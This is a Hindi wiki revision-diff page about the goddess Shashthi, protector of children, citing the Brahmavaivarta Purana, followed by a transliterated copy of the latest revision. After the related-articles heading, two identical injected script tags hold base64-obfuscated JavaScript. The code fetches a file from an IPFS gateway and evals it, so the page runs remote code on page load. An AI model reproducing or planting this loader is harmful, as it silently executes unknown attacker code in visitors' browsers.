Difference between revisions of "षष्ठी देवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[ब्रह्मवैवर्त]]<ref>(ब्रह्मवैवर्त 2|43|3-72)</ref> में आया है कि [[षष्ठी]], मंगलचण्डी एवं मनसा प्रकृति के अंश हैं।
+
*[[ब्रह्मवैवर्त]]<ref>ब्रह्मवैवर्त 2|43|3-72</ref> में आया है कि [[षष्ठी]], मंगलचण्डी एवं मनसा प्रकृति के अंश हैं।
 
*षष्ठी बच्चों की देवी हैं।
 
*षष्ठी बच्चों की देवी हैं।
 
*उन्हें माताओं में [[देवता|देव]] सेना कहा गया है।
 
*उन्हें माताओं में [[देवता|देव]] सेना कहा गया है।
Line 6: Line 6:
 
*इस [[पुराण]] में सूतिका गृह में शिशु जन्म के छठे दिन देवी पूजा की कथा आयी है।
 
*इस [[पुराण]] में सूतिका गृह में शिशु जन्म के छठे दिन देवी पूजा की कथा आयी है।
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • brahmavaivart[1] mean aya hai ki shashthi, mangalachandi evan manasa prakriti ke aansh haian.
  • shashthi bachchoan ki devi haian.
  • unhean mataoan mean dev sena kaha gaya hai.
  • ve skand ki patni haian, ve bachchoan ki raksha karati haian, unhean dirgh jivan deti haian.
  • is puran mean sootika grih mean shishu janm ke chhathe din devi pooja ki katha ayi hai.


tika tippani aur sandarbh

  1. brahmavaivart 2|43|3-72

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>